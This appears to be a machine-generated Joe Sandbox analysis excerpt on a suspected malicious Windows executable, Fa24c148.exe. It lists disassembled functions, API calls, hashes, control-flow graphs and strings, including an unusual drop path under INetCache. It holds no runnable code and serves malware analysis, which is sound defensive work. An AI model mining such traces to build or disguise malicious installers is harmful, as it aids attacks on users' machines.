                                                                                                    • String ID: "C:\Users\user\Desktop\Fa24c148.exe"$C:\Users\user\AppData\Local\Temp\$\*.*$dannebrogsordnen\gypseian.tof
                                                                                                    • API String ID: 2035342205-1195280149
                                                                                                    • Opcode ID: 42740435911353286c6922aa83c672c94fcfc96c868b16cb6d961babd0fb7d8c
                                                                                                    • Instruction ID: b79195ecc2de65d8d99f91511e5e2c7060301b719c54f9eae921112220d3ef15
                                                                                                    • Opcode Fuzzy Hash: 42740435911353286c6922aa83c672c94fcfc96c868b16cb6d961babd0fb7d8c
                                                                                                    • Instruction Fuzzy Hash: 2C41CF30901A14F6DB216B618C89EAF7678EF45724F60457BF804721D1D77C89C1EE6E
                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNELBASE(?,004256E8,C:\,00405913,C:\,C:\,00000000,C:\,C:\,?,?,74DF3420,0040561F,?,C:\Users\user\AppData\Local\Temp\,74DF3420), ref: 004060C5
                                                                                                    • FindClose.KERNEL32(00000000), ref: 004060D1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                    • String ID: C:\$VB
                                                                                                    • API String ID: 2295610775-997398997
                                                                                                    • Opcode ID: 0d7890576d52439fda81d3ff5c831c2ea13596096c8ebb05fd3cc094a7cb3954
                                                                                                    • Instruction ID: f9ddfc5d4f3467e36225d2e4908305aa5d63d15eb4a774a72597514f161c5606
                                                                                                    • Opcode Fuzzy Hash: 0d7890576d52439fda81d3ff5c831c2ea13596096c8ebb05fd3cc094a7cb3954
                                                                                                    • Instruction Fuzzy Hash: 95D012719890309BC2105B386D0C84B7A589F153317528F73F42AF23E0C7388C6596AD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b5652d2671bdba289ad27ff2dbd2e251a3084f56fb371cc4bb45df86323f9214
                                                                                                    • Instruction ID: 3bb9d82cab8560ee02f1719a45e7f61305cf8b7accb1ce145186acec9c03a25a
                                                                                                    • Opcode Fuzzy Hash: b5652d2671bdba289ad27ff2dbd2e251a3084f56fb371cc4bb45df86323f9214
                                                                                                    • Instruction Fuzzy Hash: B6F17870D04229CBDF28CFA8C8946ADBBB1FF44305F25816ED856BB281D7785A96CF44
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(?,?,00000020,00403242,00000008), ref: 004060F3
                                                                                                    • LoadLibraryA.KERNELBASE(?,?,00000020,00403242,00000008), ref: 004060FE
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0040610F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 310444273-0
                                                                                                    • Opcode ID: 9fd8a9fe8f036a5891475527ba8adc4fecc6861406a6458080dad13fdc4695bd
                                                                                                    • Instruction ID: aca730e0da059772988c79adabdc3e9a20cb86bb5b3cd76b20d24f00bd9ffcf2
                                                                                                    • Opcode Fuzzy Hash: 9fd8a9fe8f036a5891475527ba8adc4fecc6861406a6458080dad13fdc4695bd
                                                                                                    • Instruction Fuzzy Hash: 25E0CD32A081205BD7114B20AD4896773AC9FDD6413050439F905FA181D7B4BC11DFA9

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 167 403741-403759 call 4060e1 170 40375b-40376b call 405cbe 167->170 171 40376d-4037a4 call 405c44 167->171 179 4037c7-4037f0 call 403a17 call 4058ca 170->179 176 4037a6-4037b7 call 405c44 171->176 177 4037bc-4037c2 lstrcatW 171->177 176->177 177->179 185 403882-40388a call 4058ca 179->185 186 4037f6-4037fb 179->186 192 403898-4038bd LoadImageW 185->192 193 40388c-403893 call 405d99 185->193 186->185 187 403801-40381b call 405c44 186->187 191 403820-403829 187->191 191->185 194 40382b-40382f 191->194 196 40393e-403946 call 40140b 192->196 197 4038bf-4038ef RegisterClassW 192->197 193->192 201 403841-40384d lstrlenW 194->201 202 403831-40383e call 4057ef 194->202 209 403950-40395b call 403a17 196->209 210 403948-40394b 196->210 198 4038f5-403939 SystemParametersInfoW CreateWindowExW 197->198 199 403a0d 197->199 198->196 206 403a0f-403a16 199->206 203 403875-40387d call 4057c2 call 405d77 201->203 204 40384f-40385d lstrcmpiW 201->204 202->201 203->185 204->203 208 40385f-403869 GetFileAttributesW 204->208 213 40386b-40386d 208->213 214 40386f-403870 call 40580e 208->214 220 403961-40397e ShowWindow LoadLibraryW 209->220 221 4039e4-4039e5 call 4050f4 209->221 210->206 213->203 213->214 214->203 223 403980-403985 LoadLibraryW 220->223 224 403987-403999 GetClassInfoW 220->224 225 4039ea-4039ec 221->225 223->224 226 4039b1-4039d4 DialogBoxParamW call 40140b 224->226 227 40399b-4039ab GetClassInfoW RegisterClassW 224->227 228 403a06-403a08 call 40140b 225->228 229 4039ee-4039f4 225->229 233 4039d9-4039e2 call 403691 226->233 227->226 228->199 229->210 231 4039fa-403a01 call 40140b 229->231 231->210 233->206
                                                                                                    APIs
                                                                                                      • Part of subcall function 004060E1: GetModuleHandleA.KERNEL32(?,?,00000020,00403242,00000008), ref: 004060F3
                                                                                                      • Part of subcall function 004060E1: LoadLibraryA.KERNELBASE(?,?,00000020,00403242,00000008), ref: 004060FE
                                                                                                      • Part of subcall function 004060E1: GetProcAddress.KERNEL32(00000000,?), ref: 0040610F
                                                                                                    • lstrcatW.KERNEL32(1033,00422698,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422698,00000000,00000006,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000,"C:\Users\user\Desktop\Fa24c148.exe"), ref: 004037C2
                                                                                                    • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\gunrack\Iglus237\unsealer,1033,00422698,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422698,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 00403842
                                                                                                    • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\gunrack\Iglus237\unsealer,1033,00422698,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422698,00000000), ref: 00403855
                                                                                                    • GetFileAttributesW.KERNEL32(Call), ref: 00403860
                                                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\gunrack\Iglus237\unsealer), ref: 004038A9
                                                                                                      • Part of subcall function 00405CBE: wsprintfW.USER32 ref: 00405CCB
                                                                                                    • RegisterClassW.USER32(00428140), ref: 004038E6
                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004038FE
                                                                                                    • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403933
                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403969
                                                                                                    • LoadLibraryW.KERNELBASE(RichEd20), ref: 0040397A
                                                                                                    • LoadLibraryW.KERNEL32(RichEd32), ref: 00403985
                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit20W,00428140), ref: 00403995
                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit,00428140), ref: 004039A2
                                                                                                    • RegisterClassW.USER32(00428140), ref: 004039AB
                                                                                                    • DialogBoxParamW.USER32(?,00000000,00403AE4,00000000), ref: 004039CA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                    • String ID: "C:\Users\user\Desktop\Fa24c148.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\gunrack\Iglus237\unsealer$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                    • API String ID: 914957316-2771000481
                                                                                                    • Opcode ID: ac3d5c1165921db0f3dc03f3453a2ea74269edb9cc618bb3ebb87fcdaaa4c481
                                                                                                    • Instruction ID: afa308160dea80a5d8dcbd85ebd8b3f8f2b3ac55536d549029ec0fdf087277f4
                                                                                                    • Opcode Fuzzy Hash: ac3d5c1165921db0f3dc03f3453a2ea74269edb9cc618bb3ebb87fcdaaa4c481
                                                                                                    • Instruction Fuzzy Hash: 5D61C471644300BAE720AF269C4AF3B3A6CEB45745F80447FF940B62E1DB799D12CA2D

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 238 403ae4-403af6 239 403c37-403c46 238->239 240 403afc-403b02 238->240 242 403c95-403caa 239->242 243 403c48-403c90 GetDlgItem * 2 call 403fbc SetClassLongW call 40140b 239->243 240->239 241 403b08-403b11 240->241 246 403b13-403b20 SetWindowPos 241->246 247 403b26-403b29 241->247 244 403cea-403cef call 404008 242->244 245 403cac-403caf 242->245 243->242 257 403cf4-403d0f 244->257 249 403cb1-403cbc call 401389 245->249 250 403ce2-403ce4 245->250 246->247 252 403b43-403b49 247->252 253 403b2b-403b3d ShowWindow 247->253 249->250 271 403cbe-403cdd SendMessageW 249->271 250->244 256 403f89 250->256 258 403b65-403b68 252->258 259 403b4b-403b60 DestroyWindow 252->259 253->252 264 403f8b-403f92 256->264 262 403d11-403d13 call 40140b 257->262 263 403d18-403d1e 257->263 267 403b6a-403b76 SetWindowLongW 258->267 268 403b7b-403b81 258->268 265 403f66-403f6c 259->265 262->263 274 403d24-403d2f 263->274 275 403f47-403f60 DestroyWindow EndDialog 263->275 265->256 272 403f6e-403f74 265->272 267->264 269 403c24-403c32 call 404023 268->269 270 403b87-403b98 GetDlgItem 268->270 269->264 276 403bb7-403bba 270->276 277 403b9a-403bb1 SendMessageW IsWindowEnabled 270->277 271->264 272->256 279 403f76-403f7f ShowWindow 272->279 274->275 280 403d35-403d82 call 405d99 call 403fbc * 3 GetDlgItem 274->280 275->265 281 403bbc-403bbd 276->281 282 403bbf-403bc2 276->282 277->256 277->276 279->256 308 403d84-403d89 280->308 309 403d8c-403dc8 ShowWindow KiUserCallbackDispatcher call 403fde EnableWindow 280->309 285 403bed-403bf2 call 403f95 281->285 286 403bd0-403bd5 282->286 287 403bc4-403bca 282->287 285->269 290 403c0b-403c1e SendMessageW 286->290 292 403bd7-403bdd 286->292 287->290 291 403bcc-403bce 287->291 290->269 291->285 296 403bf4-403bfd call 40140b 292->296 297 403bdf-403be5 call 40140b 292->297 296->269 305 403bff-403c09 296->305 306 403beb 297->306 305->306 306->285 308->309 312 403dca-403dcb 309->312 313 403dcd 309->313 314 403dcf-403dfd GetSystemMenu EnableMenuItem SendMessageW 312->314 313->314 315 403e12 314->315 316 403dff-403e10 SendMessageW 314->316 317 403e18-403e56 call 403ff1 call 405d77 lstrlenW call 405d99 SetWindowTextW call 401389 315->317 316->317 317->257 326 403e5c-403e5e 317->326 326->257 327 403e64-403e68 326->327 328 403e87-403e9b DestroyWindow 327->328 329 403e6a-403e70 327->329 328->265 331 403ea1-403ece CreateDialogParamW 328->331 329->256 330 403e76-403e7c 329->330 330->257 332 403e82 330->332 331->265 333 403ed4-403f2b call 403fbc GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 331->333 332->256 333->256 338 403f2d-403f40 ShowWindow call 404008 333->338 340 403f45 338->340 340->265
                                                                                                    APIs
                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B20
                                                                                                    • ShowWindow.USER32(?), ref: 00403B3D
                                                                                                    • DestroyWindow.USER32 ref: 00403B51
                                                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403B6D
                                                                                                    • GetDlgItem.USER32(?,?), ref: 00403B8E
                                                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403BA2
                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 00403BA9
                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00403C57
                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00403C61
                                                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 00403C7B
                                                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403CCC
                                                                                                    • GetDlgItem.USER32(?,00000003), ref: 00403D72
                                                                                                    • ShowWindow.USER32(00000000,?), ref: 00403D93
                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403DA5
                                                                                                    • EnableWindow.USER32(?,?), ref: 00403DC0
                                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403DD6
                                                                                                    • EnableMenuItem.USER32(00000000), ref: 00403DDD
                                                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403DF5
                                                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403E08
                                                                                                    • lstrlenW.KERNEL32(00422698,?,00422698,004281A0), ref: 00403E31
                                                                                                    • SetWindowTextW.USER32(?,00422698), ref: 00403E45
                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 00403F79
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 3282139019-0
                                                                                                    • Opcode ID: b121bc2ed9969a9fb6c21bfc6921f06f0261ed8b33c3b4db69171897c6bfb89c
                                                                                                    • Instruction ID: d7c36ab4ba1e77d3c514d2e075e7bf05f8385f4f0eed445bed2eaaef7d4a98f3
                                                                                                    • Opcode Fuzzy Hash: b121bc2ed9969a9fb6c21bfc6921f06f0261ed8b33c3b4db69171897c6bfb89c
                                                                                                    • Instruction Fuzzy Hash: 71C1AE71A04205ABEB216F61ED45D3B7A7CFB49306F40053EF501B11E1CB79A952DB2E

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 341 402d69-402db7 GetTickCount GetModuleFileNameW call 4059e3 344 402dc3-402df1 call 405d77 call 40580e call 405d77 GetFileSize 341->344 345 402db9-402dbe 341->345 353 402df7 344->353 354 402ede-402eec call 402d05 344->354 346 402f9b-402f9f 345->346 356 402dfc-402e13 353->356 360 402f41-402f46 354->360 361 402eee-402ef1 354->361 358 402e15 356->358 359 402e17-402e20 call 40319e 356->359 358->359 367 402e26-402e2d 359->367 368 402f48-402f50 call 402d05 359->368 360->346 363 402ef3-402f0b call 4031b4 call 40319e 361->363 364 402f15-402f3f GlobalAlloc call 4031b4 call 402fa2 361->364 363->360 387 402f0d-402f13 363->387 364->360 392 402f52-402f63 364->392 372 402ea9-402ead 367->372 373 402e2f-402e43 call 40599e 367->373 368->360 377 402eb7-402ebd 372->377 378 402eaf-402eb6 call 402d05 372->378 373->377 390 402e45-402e4c 373->390 383 402ecc-402ed6 377->383 384 402ebf-402ec9 call 40618f 377->384 378->377 383->356 391 402edc 383->391 384->383 387->360 387->364 390->377 396 402e4e-402e55 390->396 391->354 393 402f65 392->393 394 402f6b-402f70 392->394 393->394 397 402f71-402f77 394->397 396->377 398 402e57-402e5e 396->398 397->397 399 402f79-402f94 SetFilePointer call 40599e 397->399 398->377 400 402e60-402e67 398->400 404 402f99 399->404 400->377 401 402e69-402e89 400->401 401->360 403 402e8f-402e93 401->403 405 402e95-402e99 403->405 406 402e9b-402ea3 403->406 404->346 405->391 405->406 406->377 407 402ea5-402ea7 406->407 407->377
                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32 ref: 00402D7A
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Fa24c148.exe,00000400,?,?,?,00000000,00403425,?), ref: 00402D96
                                                                                                      • Part of subcall function 004059E3: GetFileAttributesW.KERNELBASE(00000003,00402DA9,C:\Users\user\Desktop\Fa24c148.exe,80000000,00000003,?,?,?,00000000,00403425,?), ref: 004059E7
